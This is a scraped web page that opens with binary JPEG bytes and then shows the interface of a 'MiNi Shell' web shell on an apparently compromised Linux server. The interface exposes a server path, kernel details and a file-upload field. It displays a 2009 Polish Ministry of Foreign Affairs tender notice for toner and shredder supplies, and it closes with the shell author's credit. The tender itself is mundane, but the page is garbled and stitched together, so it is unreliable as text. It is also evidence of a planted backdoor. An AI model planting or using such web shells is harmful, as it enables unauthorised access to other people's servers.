JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090515/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090515/150202-N-2009.html

<p class="kh_header"><b>Warszawa: Dostawa oryginalnych (fabrycznie nowych) materiałów eksploatacyjnych do kserokopiarek, faksów i niszczarek dla potrzeb MSZ</b><br>
<b>Numer ogłoszenia: 150202 - 2009; data zamieszczenia: 15.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Obsługi Ministerstwa Spraw Zagranicznych , Al. Szucha 23, 00-580 Warszawa, woj. mazowieckie, tel. 022 5239962, faks 022 6283363.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.msz.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa centralna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa oryginalnych (fabrycznie nowych) materiałów eksploatacyjnych do kserokopiarek, faksów i niszczarek dla potrzeb MSZ.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa oryginalnych (fabrycznie nowych) materiałów eksploatacyjnych do kserokopiarek , faksów i niszczarek znajdujących się we wszystkich obiektach Ministerstwa Spraw Zagranicznych.


 Szczegółowy wykaz materiałów eksploatacyjnych objętych przedmiotem zamówienia:


a)	Materiały eksploatacyjne do faksów:

Lp.	Oznaczenie faksu	Materiał	Ilość sztuk
1.	Minolta MF-1600	Cardrige	40
2.	Mita TC-710	Toner	4
3.	Mita Vi-30	Cardrige	40
4.	Mita TC-710	Zespół bębna	2
5.	Minolta MF-1600	Zespół bębna	20
6.	Konika 7013	Toner	30
7.	Konika 7013	Zespół bębna	25
8.	Konika 7013	Zespół utrwalania	8
9.	Konika 130F	Zespół bębna	20
10.	Konika 130F	Toner	20
11.	Konika 130F	Zespół utrwalania	8
12.	Bizhub C-20	Zestaw 3 tonerów kolorowych - 1 kpl	20
13.	Bizhub C-20	Toner czarny	50
14.	Bizhub C-20	Zestaw bębnów	10


b)	Materiały eksploatacyjne do kserokopiarek:

Lp.	Oznaczenie kserokopiarki	Materiał	Ilość sztuk
1.	Mita DC 1460	Toner	12
2.	Mita DC 2355	Toner	5
3.	Mita DC 2360	Toner	60
4.	Mita DC 4060	Toner	8
5.	Mita Vi 300	Toner	6
6.	Minolta Di 250	Toner	20
7.	Minolta Di 250	Zespół bębna	6
8.	Minolta Di 2510	Toner	50
9.	Minolta Di 3510	Toner	5
10.	Minolta Dialta Di 7210	Toner	14
11.	Minolta Dialta Di 7210	Zszywki MS 10A (MS10A)	15
12.	Minolta 1611	Toner	20
13.	Minolta Bizhub C-250 set kolor	Toner czarny	25
14.	Minolta Bizhub C-250 set kolor	Toner Y-yelow	8
15.	Minolta Bizhub C-250 set kolor	Toner M-magente	8
16.	Minolta Bizhub C-250 set kolor	Toner C-cyon	8
17.	Minolta Bizhub C-250	Pojemnik na zużyty toner	5
18.	Bizhub C-253	Toner czarny	100
19.	Bizhub C-253	Zestaw 3 tonerów kolorowych - 1 kpl.	30
20.	Bizhub C-253	Zestaw bębnów	20
21.	Bizhub C-253	Pojemnik na zużyty toner	5
22.	Minolta Bizhub 750	Toner	40
23.	Minolta Bizhub 750	Zszywki 14YK	10
24.	Minolta magicolor 2490MF	Toner czarny	10
25.	Minolta magicolor 2490MF zestaw 3 tonerów kolor	Toner	5
26.	Minolta magicolor 2490MF	Zespół bębna	4
27.	Minolta magicolor 2490MF	Zespół transferowy	4
28.	Xerox XC 1033	Toner	2
29.	Xerox 1033	Zespół bębna	2

c)	Materiały eksploatacyjne do niszczarek:

Lp.	Oznaczenie niszczarki	Materiał	Ilość sztuk
1.	Ideal Typ 2400 cros cat	Koła zębate - 1 kpl	20
2.	Intimus Typ Simplex SE	Koła zębate - 1 kpl	20


Zamawiający  zgodnie z art. 29 i 30 ustawy dopuszcza składanie ofert na materiały eksploatacyjne o parametrach równoważnych i wyższych niż przedstawione w SIWZ. Wszystkie użyte znaki towarowe i nazwy w opisie parametrów technicznych są przykładowe. 


Szczególne warunki:
- Ze względu na możliwość likwidacji starych lub zakupu nowych urządzeń asortyment może ulec zmianie w ramach obowiązującej umowy, nie przekraczając jej wartości
- Miejsce dostawy: Magazyn Główny MSZ, ul. Taneczna 73, Warszawa
- Dostawca, w trakcie realizacji dostaw objętych przedmiotem umowy zobowiązany będzie do organizacji oraz zapewnienia zbierania zużytych cardrige, opakowań po tonerach, itp
- Podane ilości materiałów eksploatacyjnych dotyczą 1 sztuki, a nie ilości opakowań fabrycznych zawierających dwie lub więcej sztuk
- Realizacja przedmiotu zamówienia odbywać się będzie sukcesywnie w miarę bieżących potrzeb Zamawiającego, na podstawie jednostkowych zamówień składanych jednorazowo w formie pisemnej przez Zamawiającego do wybranego Wykonawcy
- Zamawiający zastrzega sobie możliwość składania zamówień jednostkowych od wartości 1 szt. asortymentu objętego przedmiotem zamówienia.
- Zamawiający zastrzega sobie prawo nie wykorzystania ilości asortymentu przedstawionego w formularzu ofertowym.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 30.12.51.00-2, 30.12.51.10-5, 30.12.51.20-8, 30.12.43.00-7, 30.12.44.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wpłacenia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1) Opis warunków udziału w postępowaniu: 
O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
a)posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. 
b)posiadają niezbędna wiedzę i doświadczenie oraz dysponują potencjałem technicznym i   osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
c)znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
d)nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 i 2 ustawy z dnia 29 stycznia 2004r. -Prawo zamówień publicznych ( Dz. U. z 2007r. nr 223 poz. 1655 z późniejszymi zmianami)..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1) Wykaz oświadczeń lub dokumentów, jakie mają dostarczyć Wykonawcy w celu 
potwierdzenia spełniania warunków udziału w postępowaniu: 
W celu potwierdzenia spełnienia warunków udziału w postępowaniu, określonych w pkt.5.1. SIWZ Wykonawcy muszą przedstawić następujące dokumenty:
  
a)Wypełnione Oświadczenie nr 1 o spełnianiu warunków zgodnych z art. 22 ust. 1 i  art. 24 ust. 1 i 2 ustawy Prawo Zamówień Publicznych ( Załącznik nr 2 do SIWZ); 
b)Wypełnione Oświadczenie nr 2 - wypełniają Wykonawcy, którzy zdecydowali się zaoferować materiały eksploatacyjne równoważne do opisu przedmiotu zamówienia zawartego w pkt. 3 SIWZ (Załącznik nr 3 do SIWZ).
c)Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej- wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
d)Aktualne zaświadczenia  właściwego naczelnika  Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca  nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne,  lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu. Zaświadczenia  muszą być wystawione nie wcześniej niż  3 miesiące przed upływem  terminu składania ofert;

Dokumenty wyszczególnione w lit. c), d) muszą być przedstawione w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem (każda strona) - przez Wykonawcę.
Zamawiający może żądać przedstawienia oryginału lub notarialnie potwierdzonej kopii dokumentu (np. jeśli przedstawiona kserokopia będzie nieczytelna lub będzie wzbudzać wątpliwości co do jej prawdziwości). 
Pozostałe wymagane dokumenty muszą być przestawione w formie oryginału. 

Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zastosowanie mają przepisy rozporządzenia Prezesa Rady Ministrów z dnia 19.05.2006r. w sprawie rodzajów dokumentów, jakich może żądać Zamawiający do Wykonawcy oraz formy, w jakich te dokumenty mogą być składane ( Dz. U. z  2006 Nr 87, poz. 605 z późniejszymi zmianami).


Treść oferty musi odpowiadać treści SIWZ..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.msz.gov.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarzą Obsługi Ministerstwa Spraw Zagranicznych
Al. Szucha 23   
00-580 Warszawa
pok. 404.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.05.2009 godzina 11:00, miejsce: Ofertę należy składać w siedzibie Zamawiającego na Dzienniku Podawczym pod adresem 00-580 Warszawa, Al. Szucha 23  lub przesłać pocztą na adres Zarządu Obsługi MSZ..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com